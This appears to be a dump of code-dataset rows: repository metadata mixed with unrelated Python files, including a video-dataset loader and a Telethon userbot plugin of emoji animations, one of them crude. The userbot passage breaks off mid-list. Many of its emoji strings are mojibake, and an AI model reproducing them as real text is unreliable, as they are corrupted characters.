| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a7e6c053f57d6bd3d3b8bb6b7743fe3239d04b30
| 187
|
py
|
Python
|
ane_research/__init__.py
|
michaeljneely/sparse-attention-explanation
|
658b181f67963fe22dd0489bd9b37bdbd05110c1
|
[
"MIT"
] | 2
|
2020-03-25T22:13:09.000Z
|
2021-01-06T04:28:03.000Z
|
ane_research/__init__.py
|
michaeljneely/sparse-attention-explanation
|
658b181f67963fe22dd0489bd9b37bdbd05110c1
|
[
"MIT"
] | null | null | null |
ane_research/__init__.py
|
michaeljneely/sparse-attention-explanation
|
658b181f67963fe22dd0489bd9b37bdbd05110c1
|
[
"MIT"
] | null | null | null |
# pylint: disable=wildcard-import
from ane_research.dataset_readers import *
from ane_research.evaluators import *
from ane_research.models import *
from ane_research.predictors import *
| 31.166667
| 42
| 0.834225
| 25
| 187
| 6.04
| 0.48
| 0.264901
| 0.344371
| 0.556291
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101604
| 187
| 5
| 43
| 37.4
| 0.89881
| 0.165775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c511e4f0b50b3cd782e528a271318b95bf1188ac
| 43
|
py
|
Python
|
Edabit/Return a String as an Integer/Sol.py
|
Pandz18/C-Programs
|
9d9b47516d3f65d348f9f72b9c0edda8246e9fab
|
[
"MIT"
] | null | null | null |
Edabit/Return a String as an Integer/Sol.py
|
Pandz18/C-Programs
|
9d9b47516d3f65d348f9f72b9c0edda8246e9fab
|
[
"MIT"
] | null | null | null |
Edabit/Return a String as an Integer/Sol.py
|
Pandz18/C-Programs
|
9d9b47516d3f65d348f9f72b9c0edda8246e9fab
|
[
"MIT"
] | null | null | null |
def string_int(txt):
return int(txt)
| 14.333333
| 21
| 0.651163
| 7
| 43
| 3.857143
| 0.714286
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.232558
| 43
| 2
| 22
| 21.5
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
3dbe76adabf689954d025f7840f192cd63c46e7a
| 8,833
|
py
|
Python
|
dataset.py
|
fengwuxuan/senet-3d
|
2de1465e5cf73b0223b0e3afa224c3734814ef3d
|
[
"MIT"
] | 9
|
2019-01-02T11:30:56.000Z
|
2021-05-17T11:55:17.000Z
|
dataset.py
|
fengwuxuan/senet-3d
|
2de1465e5cf73b0223b0e3afa224c3734814ef3d
|
[
"MIT"
] | 1
|
2020-09-24T07:29:33.000Z
|
2020-09-24T07:29:33.000Z
|
dataset.py
|
fengwuxuan/senet-3d
|
2de1465e5cf73b0223b0e3afa224c3734814ef3d
|
[
"MIT"
] | 1
|
2019-05-27T08:19:52.000Z
|
2019-05-27T08:19:52.000Z
|
from datasets.kinetics import Kinetics
from datasets.activitynet import ActivityNet
from datasets.ucf101 import UCF101
from datasets.hmdb51 import HMDB51
from datasets.something import Something
from datasets.fire import FIRE
def get_training_set(opt, spatial_transform, temporal_transform,
target_transform):
assert opt.dataset in ['kinetics', 'activitynet', 'ucf101', 'hmdb51','something','fire']
if opt.dataset == 'kinetics':
training_data = Kinetics(
opt.video_path+"/train_256",
opt.annotation_path,
'training',
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform)
elif opt.dataset == 'activitynet':
training_data = ActivityNet(
opt.video_path,
opt.annotation_path,
'training',
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform)
elif opt.dataset == 'ucf101':
opt.annotation_path = opt.annotation_path + "/train_rgb_ucf101.txt"
training_data = UCF101(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform)
elif opt.dataset == 'hmdb51':
opt.annotation_path = opt.annotation_path + "/train_rgb_hmdb51.txt"
training_data = HMDB51(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform)
elif opt.dataset == 'something':
training_data = Something(
opt.video_path,
opt.annotation_path,
'training',
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform)
elif opt.dataset == 'fire':
opt.annotation_path = opt.annotation_path + "/train_fire.txt"
training_data = FIRE(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform)
return training_data
def get_validation_set(opt, spatial_transform, temporal_transform,
target_transform):
assert opt.dataset in ['kinetics', 'activitynet', 'ucf101', 'hmdb51','something','fire']
if opt.dataset == 'kinetics':
validation_data = Kinetics(
opt.video_path+"/val_256",
opt.annotation_path,
'validation',
opt.n_val_samples,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'activitynet':
validation_data = ActivityNet(
opt.video_path,
opt.annotation_path,
'validation',
opt.n_val_samples,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'ucf101':
opt.annotation_path = opt.annotation_path.replace("train","test")
#opt.annotation_path = opt.annotation_path + "/test_rgb_ucf101.txt"
validation_data = UCF101(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform,
test_mode = True)
elif opt.dataset == 'hmdb51':
opt.annotation_path = opt.annotation_path.replace("train","val")
validation_data = HMDB51(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform)
elif opt.dataset == 'fire':
opt.annotation_path = opt.annotation_path.replace("train","test")
validation_data = FIRE(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform)
elif opt.dataset == 'something':
validation_data = Something(
opt.video_path,
opt.annotation_path,
'validation',
opt.n_val_samples,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
return validation_data
def get_test_set(opt, spatial_transform, temporal_transform, target_transform):
assert opt.dataset in ['kinetics', 'activitynet', 'ucf101', 'hmdb51','something','fire']
assert opt.test_subset in ['val', 'test']
if opt.test_subset == 'val':
subset = 'validation'
elif opt.test_subset == 'test':
subset = 'testing'
if opt.dataset == 'kinetics':
test_data = Kinetics(
opt.video_path,
opt.annotation_path,
subset,
0,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration,
sample_stride=opt.sample_stride)
elif opt.dataset == 'activitynet':
test_data = ActivityNet(
opt.video_path,
opt.annotation_path,
subset,
0,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'ucf101':
opt.annotation_path = opt.annotation_path + "/test_rgb_ucf101.txt"
test_data = UCF101(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform,
test_mode = True)
elif opt.dataset == 'hmdb51':
test_data = HMDB51(
opt.video_path,
opt.annotation_path,
subset,
0,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'something':
test_data = Something(
opt.video_path,
opt.annotation_path,
subset,
0,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'fire':
opt.annotation_path = "/DATACENTER2/wxy/workspace/senet-3d/datasets/txt/test_fire.txt"
test_data = FIRE(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform,
test_mode=True,
test_idx=opt.test_idx)
return test_data
| 44.386935
| 152
| 0.479905
| 696
| 8,833
| 5.811782
| 0.079023
| 0.112485
| 0.147095
| 0.124598
| 0.81953
| 0.804697
| 0.804697
| 0.798269
| 0.768109
| 0.760198
| 0
| 0.016156
| 0.453413
| 8,833
| 198
| 153
| 44.611111
| 0.821665
| 0.007472
| 0
| 0.745946
| 0
| 0
| 0.060689
| 0.011864
| 0
| 0
| 0
| 0
| 0.021622
| 1
| 0.016216
| false
| 0
| 0.032432
| 0
| 0.064865
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3dbf5709a69a969116a377fdd1856375de1c22e2
| 42
|
py
|
Python
|
tests/__init__.py
|
scadnano-test-user/scadnano-python-package-1
|
9becb5a076579f6cbac1ebfeda514540bb84ab87
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
scadnano-test-user/scadnano-python-package-1
|
9becb5a076579f6cbac1ebfeda514540bb84ab87
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
scadnano-test-user/scadnano-python-package-1
|
9becb5a076579f6cbac1ebfeda514540bb84ab87
|
[
"MIT"
] | null | null | null |
from scadnano_copy.scadnano_copy import *
| 21
| 41
| 0.857143
| 6
| 42
| 5.666667
| 0.666667
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9a84dc5171b4740cf3433eae2b9f3d2c1e7238c0
| 19,909
|
py
|
Python
|
userbot/plugins/animazioni1.py
|
sethgld/userbotseth
|
2994aa84be57aed8ab036ed6f59342d9ca2f3cb2
|
[
"MIT"
] | null | null | null |
userbot/plugins/animazioni1.py
|
sethgld/userbotseth
|
2994aa84be57aed8ab036ed6f59342d9ca2f3cb2
|
[
"MIT"
] | null | null | null |
userbot/plugins/animazioni1.py
|
sethgld/userbotseth
|
2994aa84be57aed8ab036ed6f59342d9ca2f3cb2
|
[
"MIT"
] | null | null | null |
"""
Commands:
.hypno
.plane
.pula
.sega
.solarsystem
.sorpresa
"""
import os
import sys
import asyncio
from telethon import events
from userbot import CMD_HELP
from userbot import ALIVE_NAME
from userbot.utils import admin_cmd
from platform import uname
DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else "I'M STUPID"
@borg.on(admin_cmd(pattern=f"hypno", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.3
animation_ttl = range(0, 15)
#input_str = event.pattern_match.group(1)
#if input_str == "hypno":
await event.edit("hypno")
animation_chars = [
"⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜",
"⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬛⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜",
"⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬛⬛⬛⬜⬜\n⬜⬜⬛⬜⬛⬜⬜\n⬜⬜⬛⬛⬛⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜",
"⬜⬜⬜⬜⬜⬜⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬛⬛⬛⬛⬛⬛",
"⬛⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜⬛",
"⬜⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛⬜",
"⬜⬜⬜⬜⬜⬜⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬜⬛⬛⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬛⬛⬜⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬛⬛⬛⬛⬛⬛",
"⬜⬜⬜⬜⬜⬜⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬜⬛⬛⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬛⬛⬜⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬛⬛⬛⬛⬛⬛",
"⬜⬜⬜⬜⬜⬜⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛\n⬛⬜⬜⬜⬛\n⬛⬜⬛⬜⬛\n⬛⬜⬜⬜⬛\n⬛⬛⬛⬛⬛",
"⬜⬜⬜\n⬜⬛⬜\n⬜⬜⬜",
"[ð゚ムノð゚ヤᄡð゚ムネ])"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 15])
@borg.on(admin_cmd(pattern=f"plane", outgoing=True))
async def _(event):
if event.fwd_from:
return
await event.edit("✈-------------")
await event.edit("-✈------------")
await event.edit("--✈-----------")
await event.edit("---✈----------")
await event.edit("----✈---------")
await event.edit("-----✈--------")
await event.edit("------✈-------")
await event.edit("-------✈------")
await event.edit("--------✈-----")
await event.edit("---------✈----")
await event.edit("----------✈---")
await event.edit("-----------✈--")
await event.edit("------------✈-")
await event.edit("-------------✈")
await asyncio.sleep(3)
await event.delete()
@borg.on(admin_cmd(pattern=r"pula"))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.2
animation_ttl = range(0, 12)
await event.edit("ð゚レᄄ ð゚ムᆴ")
animation_chars = [
"ð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ",
"ð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ",
"ð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ",
"ð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ",
"ð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ",
"ð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ",
"ð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ",
"ð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ",
"ð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ",
"ð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ",
"ð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ",
f"{DEFAULTUSER} **ð゚レᄄ ð゚ムᆴ♂» Oh no! è arrivata la pulað゚リ゙**"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 12])
@borg.on(admin_cmd(pattern="sega", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.2
animation_ttl = range(0, 100)
#input_str = event.pattern_match.group(1)
#if input_str == "sega":
await event.edit("sega")
animation_chars = [
"8✊️===D",
"8=✊️==D",
"8==✊️=D",
"8===✊️D",
"8==✊️=D",
"8=✊️==D",
"8✊️===D",
"8===✊️Dð゚メᆭ",
"8==✊️=Dð゚メᆭð゚メᆭ",
"8=✊️==Dð゚メᆭð゚メᆭð゚メᆭ"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 8])
@borg.on(admin_cmd(pattern=f"snake", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.3
animation_ttl = range(0, 27)
#input_str = event.pattern_match.group(1)
#if input_str == "snake":
await event.edit("snake")
animation_chars = [
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◼️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◼️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◼️◻️◼️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 27])
@borg.on(admin_cmd(pattern=f"solarsystem", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.1
animation_ttl = range(0, 549755813888)
#input_str = event.pattern_match.group(1)
#if input_str == "solarsystem":
await event.edit("solarsystem")
animation_chars = [
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
